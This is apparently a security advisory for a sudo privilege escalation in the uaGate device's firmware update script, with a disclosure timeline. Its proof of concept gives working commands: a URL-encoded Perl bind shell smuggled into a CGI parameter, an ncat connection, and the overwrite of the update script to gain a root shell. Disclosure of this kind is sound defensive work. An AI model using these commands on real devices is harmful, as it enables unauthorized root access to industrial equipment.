The uaGates firmware update script, that is called from the webserver user with sudo, handles its parameters in a unsafe fashion. So along with a legitimate firmware image, a second firmware file can be supplied to the script. The second firmware image can be crafted to just override the very same firmware update script installing the malicious firmware image. When the firware update script is called again, it executes the pay load supplied in the malicious firmware update with superuser rights.
An attacker that already managed to gain the ability to execude code on the device, can use this exploit to gain superuser rights.
proof of concept details
poc #1 (mitigated in 1.71.00.1225)
# deploy a remote bind shell (using cve-2019-11527) curl --silent --user itadmin:******** 'http://uagate/cgi-bin/it/registerAzureIotProxy.cgi?task=register&deviceId=%26perl%20-e%20%27use%20Socket%3B%24p%3D4223%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bbind%28S%2Csockaddr_in%28%24p%2C%20INADDR_ANY%29%29%3Blisten%28S%2CSOMAXCONN%29%3Bfor%28%3B%24p%3Daccept%28C%2CS%29%3Bclose%20C%29%7Bopen%28STDIN%2C%22%3E%26C%22%29%3Bopen%28STDOUT%2C%22%3E%26C%22%29%3Bopen%28STDERR%2C%22%3E%26C%22%29%3Bexec%28%22%2Fbin%2Fbash%20-i%22%29%3B%7D%3B%27%26' # conect to the uagate on the shell ncat uagate 4223 # get propper tty python -c "import pty; pty.spawn('/bin/bash')" # start proof of concept echo '#!/bin/bash' > /tmp/updateFirmware echo 'if [ "$1" == "--interactive" ]; then bash; fi;' >> /tmp/updateFirmware cat /usr/local/bin/updateFirmware >> /tmp/updateFirmware chmod +x /tmp/updateFirmware busybox bzip2 /tmp/updateFirmware # next step requires writing to /usr/local/bin (cve-2019-11528) mv /tmp/updateFirmware.bz2 /usr/local/bin/updateFirmware.bz2 cd /usr/local/bin/ echo "just a trash file to nudge the update script" > trash.bz2 sudo ./updateFirmware "updateFirmware.bz2 trash.bz2" sudo ./updateFirmware --interactive
- day 0 - pentest of uaGate SI Device - 21.12.2018
- day 28 - initial issue related contact to manufacturer - 18.01.2019
- day 63 - issue report to manufacturer - 22.02.2019
- day 66 - secure communication cannel established - 25.02.2019
- day 74 - detailed issue report to manufacturer - 05.03.2019
- day 116 - manufacurer ackloknowledged security issues - 16.04.2019
- day 125 - CVE ID issued by MITRE - 25.04.2019
- day 229 - mitigation found in 1.71.00.1225 - 07.08.2019
- day 293 - released - 10.10.2019